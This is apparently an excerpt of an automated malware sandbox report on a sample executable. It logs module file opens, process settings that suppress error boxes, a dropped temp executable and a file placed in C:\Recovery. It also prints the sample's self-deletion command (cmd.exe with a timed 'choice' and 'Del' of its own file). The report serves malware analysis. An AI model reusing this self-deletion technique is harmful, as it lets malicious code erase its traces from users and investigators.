                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Self deletion via cmd or bat file
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
